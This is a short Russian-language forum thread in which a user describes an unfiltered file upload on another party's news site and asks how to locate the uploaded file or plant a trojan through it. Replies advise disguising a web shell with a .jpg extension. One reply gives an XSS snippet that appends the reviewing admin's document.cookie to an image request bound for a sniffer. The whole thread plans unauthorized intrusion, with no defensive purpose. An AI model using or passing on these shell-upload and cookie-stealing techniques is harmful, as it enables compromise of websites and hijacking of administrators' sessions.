Хм...

Discussion in 'Болталка' started by Jonathan Allen, 31 Jan 2006.

  1. Jonathan Allen

    Joined:
    21 Mar 2005
    Messages:
    62
    Likes Received:
    6
    Reputations:
    2
    Я вот нашел неплохую таку "штуку" на одном из интресующих меня сайтов. При добавлении новости, если вставлять картинку, - окончание файла не фильтруется, то есть я могу и php и... даже (!).exe фалы добавлять. Но вот в чем проблема. - я не знаю путь к файлу, который добавил. Так вот, как можно определить куда был залит файл, его точное местоположение. Возможно можно написать какой-то скрипт. если да, то какой. Или же, допустим залить троян. Вот, незнаю что делать прям. 8(
     
  2. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    Загрузи картинку, нажми на неё правой кнопкой мыши, и там выбери свойства)))там смотри путь к картинке, а сл-но по этому пути и должны другие файлы лежать)))
     
  3. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    Сделай расширение у шелла jpg и все .
     
  4. Jonathan Allen

    Joined:
    21 Mar 2005
    Messages:
    62
    Likes Received:
    6
    Reputations:
    2
    Не в этом дело! Эту новость должен проверить админ перед тем как постить, то есть ты её не видешь, а тольо админ видет, и если все ок то вешает её или же наоборот удаляет... после проверки.
     
  5. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    Отошли ему картинку с

    <script>img=new Image(); img.src='/cgi-bin/s.jpg'+document.cookie;</script>

    потом жди когда на снифер что нить придет .